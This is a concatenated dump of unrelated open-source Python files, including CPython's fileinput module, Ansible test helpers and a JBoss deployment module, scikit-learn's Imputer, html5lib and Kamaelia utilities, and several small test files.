"""
if not _state:
raise RuntimeError("no active input()")
return _state.filename()
def lineno():
"""
Return the cumulative line number of the line that has just been read.
Before the first line has been read, returns 0. After the last line
of the last file has been read, returns the line number of that line.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.lineno()
def filelineno():
"""
Return the line number in the current file. Before the first line
has been read, returns 0. After the last line of the last file has
been read, returns the line number of that line within the file.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.filelineno()
def fileno():
"""
Return the file number of the current file. When no file is currently
opened, returns -1.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.fileno()
def isfirstline():
"""
    Returns true if the line just read is the first line of its file,
otherwise returns false.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.isfirstline()
def isstdin():
"""
Returns true if the last line was read from sys.stdin,
otherwise returns false.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.isstdin()
class FileInput:
"""class FileInput([files[, inplace[, backup[, mode[, openhook]]]]])
Class FileInput is the implementation of the module; its methods
    filename(), lineno(), filelineno(), isfirstline(), isstdin(), fileno(),
nextfile() and close() correspond to the functions of the same name
in the module.
In addition it has a readline() method which returns the next
input line, and a __getitem__() method which implements the
sequence behavior. The sequence must be accessed in strictly
sequential order; random access and readline() cannot be mixed.
"""
def __init__(self, files=None, inplace=False, backup="", bufsize=0,
mode="r", openhook=None):
if isinstance(files, str):
files = (files,)
else:
if files is None:
files = sys.argv[1:]
if not files:
files = ('-',)
else:
files = tuple(files)
self._files = files
self._inplace = inplace
self._backup = backup
self._bufsize = bufsize or DEFAULT_BUFSIZE
self._savestdout = None
self._output = None
self._filename = None
self._lineno = 0
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = None
self._buffer = []
self._bufindex = 0
# restrict mode argument to reading modes
if mode not in ('r', 'rU', 'U', 'rb'):
raise ValueError("FileInput opening mode must be one of "
"'r', 'rU', 'U' and 'rb'")
self._mode = mode
if inplace and openhook:
raise ValueError("FileInput cannot use an opening hook in inplace mode")
elif openhook and not hasattr(openhook, '__call__'):
raise ValueError("FileInput openhook must be callable")
self._openhook = openhook
def __del__(self):
self.close()
def close(self):
self.nextfile()
self._files = ()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __iter__(self):
return self
def __next__(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
line = self.readline()
if not line:
raise StopIteration
return line
def __getitem__(self, i):
if i != self._lineno:
raise RuntimeError("accessing lines out of order")
try:
return self.__next__()
except StopIteration:
raise IndexError("end of input reached")
def nextfile(self):
savestdout = self._savestdout
self._savestdout = 0
if savestdout:
sys.stdout = savestdout
output = self._output
self._output = 0
if output:
output.close()
file = self._file
self._file = 0
if file and not self._isstdin:
file.close()
backupfilename = self._backupfilename
self._backupfilename = 0
if backupfilename and not self._backup:
try: os.unlink(backupfilename)
except OSError: pass
self._isstdin = False
self._buffer = []
self._bufindex = 0
def readline(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
if not self._file:
if not self._files:
return ""
self._filename = self._files[0]
self._files = self._files[1:]
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = 0
if self._filename == '-':
self._filename = '<stdin>'
self._file = sys.stdin
self._isstdin = True
else:
if self._inplace:
self._backupfilename = (
self._filename + (self._backup or ".bak"))
try: os.unlink(self._backupfilename)
except os.error: pass
# The next few lines may raise IOError
os.rename(self._filename, self._backupfilename)
self._file = open(self._backupfilename, self._mode)
try:
perm = os.fstat(self._file.fileno()).st_mode
except OSError:
self._output = open(self._filename, "w")
else:
mode = os.O_CREAT | os.O_WRONLY | os.O_TRUNC
if hasattr(os, 'O_BINARY'):
mode |= os.O_BINARY
fd = os.open(self._filename, mode, perm)
self._output = os.fdopen(fd, "w")
try:
if hasattr(os, 'chmod'):
os.chmod(self._filename, perm)
except OSError:
pass
self._savestdout = sys.stdout
sys.stdout = self._output
else:
# This may raise IOError
if self._openhook:
self._file = self._openhook(self._filename, self._mode)
else:
self._file = open(self._filename, self._mode)
self._buffer = self._file.readlines(self._bufsize)
self._bufindex = 0
if not self._buffer:
self.nextfile()
# Recursive call
return self.readline()
def filename(self):
return self._filename
def lineno(self):
return self._lineno
def filelineno(self):
return self._filelineno
def fileno(self):
if self._file:
try:
return self._file.fileno()
except ValueError:
return -1
else:
return -1
def isfirstline(self):
return self._filelineno == 1
def isstdin(self):
return self._isstdin
def hook_compressed(filename, mode):
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode)
elif ext == '.bz2':
import bz2
return bz2.BZ2File(filename, mode)
else:
return open(filename, mode)
def hook_encoded(encoding):
import codecs
def openhook(filename, mode):
return codecs.open(filename, mode, encoding)
return openhook
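# Illustrative use of the hooks above (assuming `files` is a list of paths):
#
#   for line in input(files, openhook=hook_encoded("latin-1")):
#       process(line)
#
#   for line in input(files, openhook=hook_compressed):
#       process(line)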
def _test():
import getopt
inplace = False
backup = False
opts, args = getopt.getopt(sys.argv[1:], "ib:")
for o, a in opts:
if o == '-i': inplace = True
if o == '-b': backup = a
for line in input(args, inplace=inplace, backup=backup):
if line[-1:] == '\n': line = line[:-1]
if line[-1:] == '\r': line = line[:-1]
print("%d: %s[%d]%s %s" % (lineno(), filename(), filelineno(),
isfirstline() and "*" or "", line))
print("%d: %s[%d]" % (lineno(), filename(), filelineno()))
if __name__ == '__main__':
_test()
|
dav1x/ansible
|
refs/heads/devel
|
test/units/modules/network/iosxr/iosxr_module.py
|
58
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
def set_module_args(args):
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args)
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except:
pass
fixture_data[path] = data
return data
class AnsibleExitJson(Exception):
pass
class AnsibleFailJson(Exception):
pass
class TestIosxrModule(unittest.TestCase):
def execute_module(self, failed=False, changed=False, commands=None,
sort=True, defaults=False):
self.load_fixtures(commands)
if failed:
result = self.failed()
self.assertTrue(result['failed'], result)
else:
result = self.changed(changed)
self.assertEqual(result['changed'], changed, result)
if commands:
if sort:
self.assertEqual(sorted(commands), sorted(result['commands']), result['commands'])
else:
self.assertEqual(commands, result['commands'], result['commands'])
return result
def failed(self):
def fail_json(*args, **kwargs):
kwargs['failed'] = True
raise AnsibleFailJson(kwargs)
with patch.object(basic.AnsibleModule, 'fail_json', fail_json):
with self.assertRaises(AnsibleFailJson) as exc:
self.module.main()
result = exc.exception.args[0]
self.assertTrue(result['failed'], result)
return result
def changed(self, changed=False):
def exit_json(*args, **kwargs):
if 'changed' not in kwargs:
kwargs['changed'] = False
raise AnsibleExitJson(kwargs)
with patch.object(basic.AnsibleModule, 'exit_json', exit_json):
with self.assertRaises(AnsibleExitJson) as exc:
self.module.main()
result = exc.exception.args[0]
self.assertEqual(result['changed'], changed, result)
return result
def load_fixtures(self, commands=None):
pass
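# Illustrative usage sketch (module and patched names assumed, not part of
# this file): a concrete test case sets `self.module` and overrides
# load_fixtures() to feed canned device output into a patched connection:
#
#   class TestIosxrCommandModule(TestIosxrModule):
#       module = iosxr_command
#
#       def load_fixtures(self, commands=None):
#           self.run_commands.return_value = [load_fixture('show_version.txt')]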
|
berendkleinhaneveld/VTK
|
refs/heads/master
|
Imaging/Core/Testing/Python/TestSimpleImageExample.py
|
20
|
#!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Image pipeline
reader = vtk.vtkPNGReader()
reader.SetFileName(VTK_DATA_ROOT + "/Data/fullhead15.png")
gradient = vtk.vtkSimpleImageFilterExample()
gradient.SetInputConnection(reader.GetOutputPort())
viewer = vtk.vtkImageViewer()
#viewer DebugOn
viewer.SetInputConnection(gradient.GetOutputPort())
viewer.SetColorWindow(1000)
viewer.SetColorLevel(500)
viewer.Render()
# --- end of script --
|
mitchrule/Miscellaneous
|
refs/heads/master
|
Django_Project/django/Lib/site-packages/pip/_vendor/html5lib/treewalkers/genshistream.py
|
1730
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
|
sparkslabs/kamaelia_
|
refs/heads/master
|
Code/Python/Kamaelia/Kamaelia/Util/Tokenisation/Simple.py
|
3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
from Axon.Component import component
from Axon.Ipc import WaitComplete, producerFinished, shutdownMicroprocess
#import re, base64
from Kamaelia.Support.Data.Escape import escape, unescape
# we need escaping to substitute for tabs, newlines (either CRs and LFs),
# spaces, and the symbols we might use for opening and closing lists
substitutions="\09\x0a\x0d\x20[]"
from Kamaelia.Util.Marshalling import Marshaller, DeMarshaller
def tokenlists_to_lines():
return Marshaller(EscapedListMarshalling)
def lines_to_tokenlists():
return DeMarshaller(EscapedListMarshalling)
class EscapedListMarshalling:
def marshall(lst,term="\n"):
out = ""
for item in lst:
if isinstance(item,(list,tuple)):
out = out + "[ " + EscapedListMarshalling.marshall(item,term="] ")
else:
# out = out + re.sub("\\n","",base64.encodestring(item)) + " "
out = out + escape(item, substitutions) + " "
return out + term
marshall = staticmethod(marshall)
def demarshall(string):
out = []
outstack = []
for item in string.split(" "):
if len(item) and item != "\n":
if item=="[":
outstack.append(out)
newout=[]
out.append(newout)
out=newout
elif item=="]":
out = outstack.pop(-1)
else:
# out.append( base64.decodestring(item) )
out.append( unescape(item, substitutions) )
return out
demarshall = staticmethod(demarshall)
__kamaelia_prefabs__ = ( tokenlists_to_lines, lines_to_tokenlists, )
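# Wire-format example (illustrative): marshalling the token list
# ["hello", ["a", "b"]] produces the single line:
#   hello [ a b ] \n
# (tokens are escaped and space-separated; "[ " opens a nested list and
# "] " closes it). demarshall() reverses the transformation.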
if __name__=="__main__":
# a few tests of this
tests = [
["hello","world"],
[["hello","world"]], # simple list nesting
[["hello world"]], # check spaces don't cause problems
["hello"," world",["1","2",[["7","alpha beta"],["5","6"]],"n"]], # lots of nesting
["hello\nworld\\today"], # newline and backslash chars
]
for test in tests:
marshalled = EscapedListMarshalling.marshall(test)
demarshalled = EscapedListMarshalling.demarshall(marshalled)
if test == demarshalled:
for char in marshalled[:-1]:
if ord(char) < 32:
raise RuntimeError("\nFAILED (LOWCHAR) : "+str(test))
if marshalled[-1] != "\n":
raise RuntimeError("\nFAILED (ENDTERM) : "+str(test))
print (".")
else:
raise RuntimeError("\nFAILED (MISMATCH) : "+str(test)+"\nIt was : "+str(demarshalled)+"\n")
|
n0trax/ansible
|
refs/heads/devel
|
lib/ansible/modules/web_infrastructure/jboss.py
|
72
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Jeroen Hoekx <jeroen.hoekx@dsquare.be>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: jboss
version_added: "1.4"
short_description: deploy applications to JBoss
description:
- Deploy applications to JBoss standalone using the filesystem
options:
deployment:
required: true
description:
- The name of the deployment
src:
required: false
description:
- The remote path of the application ear or war to deploy
deploy_path:
required: false
default: /var/lib/jbossas/standalone/deployments
description:
- The location in the filesystem where the deployment scanner listens
state:
required: false
choices: [ present, absent ]
default: "present"
description:
- Whether the application should be deployed or undeployed
notes:
- "The JBoss standalone deployment-scanner has to be enabled in standalone.xml"
- "Ensure no identically named application is deployed through the JBoss CLI"
author: "Jeroen Hoekx (@jhoekx)"
"""
EXAMPLES = """
# Deploy a hello world application
- jboss:
src: /tmp/hello-1.0-SNAPSHOT.war
deployment: hello.war
state: present
# Update the hello world application
- jboss:
src: /tmp/hello-1.1-SNAPSHOT.war
deployment: hello.war
state: present
# Undeploy the hello world application
- jboss:
deployment: hello.war
state: absent
"""
import os
import shutil
import time
from ansible.module_utils.basic import AnsibleModule
def is_deployed(deploy_path, deployment):
return os.path.exists(os.path.join(deploy_path, "%s.deployed" % deployment))
def is_undeployed(deploy_path, deployment):
return os.path.exists(os.path.join(deploy_path, "%s.undeployed" % deployment))
def is_failed(deploy_path, deployment):
return os.path.exists(os.path.join(deploy_path, "%s.failed" % deployment))
def main():
module = AnsibleModule(
argument_spec=dict(
src=dict(type='path'),
deployment=dict(required=True),
deploy_path=dict(type='path', default='/var/lib/jbossas/standalone/deployments'),
state=dict(choices=['absent', 'present'], default='present'),
),
required_if=[('state', 'present', ('src',))]
)
result = dict(changed=False)
src = module.params['src']
deployment = module.params['deployment']
deploy_path = module.params['deploy_path']
state = module.params['state']
if not os.path.exists(deploy_path):
module.fail_json(msg="deploy_path does not exist.")
deployed = is_deployed(deploy_path, deployment)
if state == 'present' and not deployed:
if not os.path.exists(src):
module.fail_json(msg='Source file %s does not exist.' % src)
if is_failed(deploy_path, deployment):
# Clean up old failed deployment
os.remove(os.path.join(deploy_path, "%s.failed" % deployment))
shutil.copyfile(src, os.path.join(deploy_path, deployment))
while not deployed:
deployed = is_deployed(deploy_path, deployment)
if is_failed(deploy_path, deployment):
module.fail_json(msg='Deploying %s failed.' % deployment)
time.sleep(1)
result['changed'] = True
if state == 'present' and deployed:
if module.sha1(src) != module.sha1(os.path.join(deploy_path, deployment)):
os.remove(os.path.join(deploy_path, "%s.deployed" % deployment))
shutil.copyfile(src, os.path.join(deploy_path, deployment))
deployed = False
while not deployed:
deployed = is_deployed(deploy_path, deployment)
if is_failed(deploy_path, deployment):
module.fail_json(msg='Deploying %s failed.' % deployment)
time.sleep(1)
result['changed'] = True
if state == 'absent' and deployed:
os.remove(os.path.join(deploy_path, "%s.deployed" % deployment))
while deployed:
deployed = not is_undeployed(deploy_path, deployment)
if is_failed(deploy_path, deployment):
module.fail_json(msg='Undeploying %s failed.' % deployment)
time.sleep(1)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
yagoocarvalho/ProjetoX9
|
refs/heads/master
|
projetox9/api.py
|
1
|
from .models import Models
from projetox9 import Config
from urllib.request import urlopen
from urllib.error import HTTPError, URLError
import json
from .utils import Utils  # assumed home of the Utils helper used in get_person_info()
class Api:
models = Models()
def get_occurrences(self):
pass
    def get_occurrence(self, CPF, protocol):
        # Placeholder stub: returns hard-coded dummy data until a real lookup exists.
        return Models.Occurrence(Models.User(CPF, ""), " ", "Lol", "", -22, -23, "kek", protocol)
def get_person_info(self, CPF):
CPF = Utils.clean_CPF(CPF)
base_url = str(Config.FakeSiga_url)
path = '/api/Dados/findOne?filter={"where":{"CPF":"' + CPF + '"}}'
try:
f = urlopen(base_url + path)
except HTTPError as e:
return Api.models.User(CPF, None)
except URLError as e:
return Api.models.User(CPF, None)
data = json.loads(f.read().decode('utf-8'))
if data["FuncionarioAdministrativo"]:
user = self.models.Admin(data["CPF"], data["Nome"])
elif data["Professor"] or data["ProfessorVisitante"] or data["FuncionarioTerceirizado"]:
user = Api.models.Employee(data["CPF"], data["Nome"])
else:
user = Api.models.User(data["CPF"], data["Nome"])
return user
def get_person_name(self, CPF):
user = self.get_person_info(CPF)
return user.name
def set_occurrence(self, CPF, occurrence, date, description, lat, lng, place_name):
user = self.get_person_info(CPF)
oc = Models.Occurrence(user, date, occurrence, description, lat, lng, place_name)
oc.save()
return(oc)
def login(self, CPF, password):
return True, True
def signup(self, CPF, password, admin):
user = Models.Employee(CPF, self.get_person_name(CPF), password, admin)
return user
|
valexandersaulys/prudential_insurance_kaggle
|
refs/heads/master
|
venv/lib/python2.7/site-packages/sklearn/preprocessing/imputation.py
|
208
|
# Authors: Nicolas Tresegnie <nicolas.tresegnie@gmail.com>
# License: BSD 3 clause
import warnings
import numpy as np
import numpy.ma as ma
from scipy import sparse
from scipy import stats
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array
from ..utils import as_float_array
from ..utils.fixes import astype
from ..utils.sparsefuncs import _get_median
from ..utils.validation import check_is_fitted
from ..externals import six
zip = six.moves.zip
map = six.moves.map
__all__ = [
'Imputer',
]
def _get_mask(X, value_to_mask):
"""Compute the boolean mask X == missing_values."""
if value_to_mask == "NaN" or np.isnan(value_to_mask):
return np.isnan(X)
else:
return X == value_to_mask
def _most_frequent(array, extra_value, n_repeat):
"""Compute the most frequent value in a 1d array extended with
[extra_value] * n_repeat, where extra_value is assumed to be not part
of the array."""
# Compute the most frequent value in array only
if array.size > 0:
mode = stats.mode(array)
most_frequent_value = mode[0][0]
most_frequent_count = mode[1][0]
else:
most_frequent_value = 0
most_frequent_count = 0
# Compare to array + [extra_value] * n_repeat
if most_frequent_count == 0 and n_repeat == 0:
return np.nan
elif most_frequent_count < n_repeat:
return extra_value
elif most_frequent_count > n_repeat:
return most_frequent_value
elif most_frequent_count == n_repeat:
        # Break the tie the same way scipy.stats.mode does
if most_frequent_value < extra_value:
return most_frequent_value
else:
return extra_value
class Imputer(BaseEstimator, TransformerMixin):
"""Imputation transformer for completing missing values.
Read more in the :ref:`User Guide <imputation>`.
Parameters
----------
missing_values : integer or "NaN", optional (default="NaN")
The placeholder for the missing values. All occurrences of
`missing_values` will be imputed. For missing values encoded as np.nan,
use the string value "NaN".
strategy : string, optional (default="mean")
The imputation strategy.
- If "mean", then replace missing values using the mean along
the axis.
- If "median", then replace missing values using the median along
the axis.
- If "most_frequent", then replace missing using the most frequent
value along the axis.
axis : integer, optional (default=0)
The axis along which to impute.
- If `axis=0`, then impute along columns.
- If `axis=1`, then impute along rows.
verbose : integer, optional (default=0)
Controls the verbosity of the imputer.
copy : boolean, optional (default=True)
If True, a copy of X will be created. If False, imputation will
be done in-place whenever possible. Note that, in the following cases,
a new copy will always be made, even if `copy=False`:
- If X is not an array of floating values;
- If X is sparse and `missing_values=0`;
- If `axis=0` and X is encoded as a CSR matrix;
- If `axis=1` and X is encoded as a CSC matrix.
Attributes
----------
statistics_ : array of shape (n_features,)
The imputation fill value for each feature if axis == 0.
Notes
-----
- When ``axis=0``, columns which only contained missing values at `fit`
are discarded upon `transform`.
- When ``axis=1``, an exception is raised if there are rows for which it is
not possible to fill in the missing values (e.g., because they only
contain missing values).
"""
def __init__(self, missing_values="NaN", strategy="mean",
axis=0, verbose=0, copy=True):
self.missing_values = missing_values
self.strategy = strategy
self.axis = axis
self.verbose = verbose
self.copy = copy
def fit(self, X, y=None):
"""Fit the imputer on X.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Input data, where ``n_samples`` is the number of samples and
``n_features`` is the number of features.
Returns
-------
self : object
Returns self.
"""
# Check parameters
allowed_strategies = ["mean", "median", "most_frequent"]
if self.strategy not in allowed_strategies:
raise ValueError("Can only use these strategies: {0} "
" got strategy={1}".format(allowed_strategies,
self.strategy))
if self.axis not in [0, 1]:
raise ValueError("Can only impute missing values on axis 0 and 1, "
" got axis={0}".format(self.axis))
# Since two different arrays can be provided in fit(X) and
# transform(X), the imputation data will be computed in transform()
# when the imputation is done per sample (i.e., when axis=1).
if self.axis == 0:
X = check_array(X, accept_sparse='csc', dtype=np.float64,
force_all_finite=False)
if sparse.issparse(X):
self.statistics_ = self._sparse_fit(X,
self.strategy,
self.missing_values,
self.axis)
else:
self.statistics_ = self._dense_fit(X,
self.strategy,
self.missing_values,
self.axis)
return self
def _sparse_fit(self, X, strategy, missing_values, axis):
"""Fit the transformer on sparse data."""
# Imputation is done "by column", so if we want to do it
# by row we only need to convert the matrix to csr format.
if axis == 1:
X = X.tocsr()
else:
X = X.tocsc()
# Count the zeros
if missing_values == 0:
n_zeros_axis = np.zeros(X.shape[not axis], dtype=int)
else:
n_zeros_axis = X.shape[axis] - np.diff(X.indptr)
# Mean
if strategy == "mean":
if missing_values != 0:
n_non_missing = n_zeros_axis
# Mask the missing elements
mask_missing_values = _get_mask(X.data, missing_values)
mask_valids = np.logical_not(mask_missing_values)
# Sum only the valid elements
new_data = X.data.copy()
new_data[mask_missing_values] = 0
X = sparse.csc_matrix((new_data, X.indices, X.indptr),
copy=False)
sums = X.sum(axis=0)
# Count the elements != 0
mask_non_zeros = sparse.csc_matrix(
(mask_valids.astype(np.float64),
X.indices,
X.indptr), copy=False)
s = mask_non_zeros.sum(axis=0)
n_non_missing = np.add(n_non_missing, s)
else:
sums = X.sum(axis=axis)
n_non_missing = np.diff(X.indptr)
# Ignore the error, columns with a np.nan statistics_
# are not an error at this point. These columns will
# be removed in transform
with np.errstate(all="ignore"):
return np.ravel(sums) / np.ravel(n_non_missing)
# Median + Most frequent
else:
# Remove the missing values, for each column
columns_all = np.hsplit(X.data, X.indptr[1:-1])
mask_missing_values = _get_mask(X.data, missing_values)
mask_valids = np.hsplit(np.logical_not(mask_missing_values),
X.indptr[1:-1])
# astype necessary for bug in numpy.hsplit before v1.9
columns = [col[astype(mask, bool, copy=False)]
for col, mask in zip(columns_all, mask_valids)]
# Median
if strategy == "median":
median = np.empty(len(columns))
for i, column in enumerate(columns):
median[i] = _get_median(column, n_zeros_axis[i])
return median
# Most frequent
elif strategy == "most_frequent":
most_frequent = np.empty(len(columns))
for i, column in enumerate(columns):
most_frequent[i] = _most_frequent(column,
0,
n_zeros_axis[i])
return most_frequent
def _dense_fit(self, X, strategy, missing_values, axis):
"""Fit the transformer on dense data."""
X = check_array(X, force_all_finite=False)
mask = _get_mask(X, missing_values)
masked_X = ma.masked_array(X, mask=mask)
# Mean
if strategy == "mean":
mean_masked = np.ma.mean(masked_X, axis=axis)
# Avoid the warning "Warning: converting a masked element to nan."
mean = np.ma.getdata(mean_masked)
mean[np.ma.getmask(mean_masked)] = np.nan
return mean
# Median
elif strategy == "median":
if tuple(int(v) for v in np.__version__.split('.')[:2]) < (1, 5):
# In old versions of numpy, calling a median on an array
                # containing nans returns nan. This is different in
                # recent versions of numpy, whose behaviour we want to mimic.
masked_X.mask = np.logical_or(masked_X.mask,
np.isnan(X))
median_masked = np.ma.median(masked_X, axis=axis)
# Avoid the warning "Warning: converting a masked element to nan."
median = np.ma.getdata(median_masked)
median[np.ma.getmaskarray(median_masked)] = np.nan
return median
# Most frequent
elif strategy == "most_frequent":
            # scipy.stats.mstats.mode cannot be used because it will not work
            # properly if the first element is masked and if its frequency
# is equal to the frequency of the most frequent valid element
# See https://github.com/scipy/scipy/issues/2636
            # To be able to access the elements by columns
if axis == 0:
X = X.transpose()
mask = mask.transpose()
most_frequent = np.empty(X.shape[0])
for i, (row, row_mask) in enumerate(zip(X[:], mask[:])):
row_mask = np.logical_not(row_mask).astype(np.bool)
row = row[row_mask]
most_frequent[i] = _most_frequent(row, np.nan, 0)
return most_frequent
def transform(self, X):
"""Impute all missing values in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
The input data to complete.
"""
if self.axis == 0:
check_is_fitted(self, 'statistics_')
# Copy just once
X = as_float_array(X, copy=self.copy, force_all_finite=False)
# Since two different arrays can be provided in fit(X) and
# transform(X), the imputation data need to be recomputed
# when the imputation is done per sample
if self.axis == 1:
X = check_array(X, accept_sparse='csr', force_all_finite=False,
copy=False)
if sparse.issparse(X):
statistics = self._sparse_fit(X,
self.strategy,
self.missing_values,
self.axis)
else:
statistics = self._dense_fit(X,
self.strategy,
self.missing_values,
self.axis)
else:
X = check_array(X, accept_sparse='csc', force_all_finite=False,
copy=False)
statistics = self.statistics_
# Delete the invalid rows/columns
invalid_mask = np.isnan(statistics)
valid_mask = np.logical_not(invalid_mask)
valid_statistics = statistics[valid_mask]
valid_statistics_indexes = np.where(valid_mask)[0]
missing = np.arange(X.shape[not self.axis])[invalid_mask]
if self.axis == 0 and invalid_mask.any():
if self.verbose:
warnings.warn("Deleting features without "
"observed values: %s" % missing)
X = X[:, valid_statistics_indexes]
elif self.axis == 1 and invalid_mask.any():
raise ValueError("Some rows only contain "
"missing values: %s" % missing)
# Do actual imputation
if sparse.issparse(X) and self.missing_values != 0:
mask = _get_mask(X.data, self.missing_values)
indexes = np.repeat(np.arange(len(X.indptr) - 1, dtype=np.int),
np.diff(X.indptr))[mask]
X.data[mask] = astype(valid_statistics[indexes], X.dtype,
copy=False)
else:
if sparse.issparse(X):
X = X.toarray()
mask = _get_mask(X, self.missing_values)
n_missing = np.sum(mask, axis=self.axis)
values = np.repeat(valid_statistics, n_missing)
if self.axis == 0:
coordinates = np.where(mask.transpose())[::-1]
else:
coordinates = mask
X[coordinates] = values
return X
|
mirzawaqasahmed/avocado-virt-tests
|
refs/heads/master
|
qemu/migration/migration.py
|
1
|
#!/usr/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See LICENSE for more details.
#
# Copyright: Red Hat Inc. 2013-2014
# Author: Lucas Meneghel Rodrigues <lmr@redhat.com>
from avocado.virt import test
class MigrationTest(test.VirtTest):
"""
Creates a VM and migrates it couple of times
:param migration_mode: Migration method
:param migration_iterations: How many times to migrate the VM
"""
def test_migrate(self):
self.vm.power_on()
migration_mode = self.params.get('migration_mode', default='tcp')
for _ in xrange(self.params.get('migration_iterations', default=4)):
self.vm.migrate(migration_mode)
self.vm.login_remote()
def cleanup(self):
if self.vm:
self.vm.power_off()
|
odin-detector/odin-data
|
refs/heads/master
|
tools/python/odin_data/testing/test_shared_buffer_manager.py
|
2
|
from odin_data.shared_buffer_manager import SharedBufferManager, SharedBufferManagerException
from nose.tools import assert_equal, assert_raises, assert_regexp_matches
from struct import Struct
shared_mem_name = "TestSharedBuffer"
buffer_size = 1000
num_buffers = 10
shared_mem_size = buffer_size * num_buffers
boost_mmap_mode = True
class TestSharedBufferManager:
@classmethod
def setup_class(cls):
# Create a shared buffer manager for use in all tests
cls.shared_buffer_manager = SharedBufferManager(
shared_mem_name, shared_mem_size,
buffer_size, remove_when_deleted=True, boost_mmap_mode=boost_mmap_mode)
@classmethod
def teardown_class(cls):
pass
def test_basic_shared_buffer(self):
        # Test that the shared buffer manager configuration is as expected
assert_equal(self.shared_buffer_manager.get_num_buffers(), num_buffers)
assert_equal(self.shared_buffer_manager.get_buffer_size(), buffer_size)
def test_existing_manager(self):
# Map the existing manager
existing_shared_buffer = SharedBufferManager(shared_mem_name, boost_mmap_mode=boost_mmap_mode)
# Test that the configuration matches the original
assert_equal(self.shared_buffer_manager.get_manager_id(), existing_shared_buffer.get_manager_id())
assert_equal(self.shared_buffer_manager.get_num_buffers(), existing_shared_buffer.get_num_buffers())
assert_equal(self.shared_buffer_manager.get_buffer_size(), existing_shared_buffer.get_buffer_size())
def test_existing_manager_absent(self):
# Attempt to map a shared buffer manager that doesn't already exist
absent_manager_name = "AbsentBufferManager"
with assert_raises(SharedBufferManagerException) as cm:
existing_shared_buffer = SharedBufferManager(absent_manager_name, boost_mmap_mode=boost_mmap_mode)
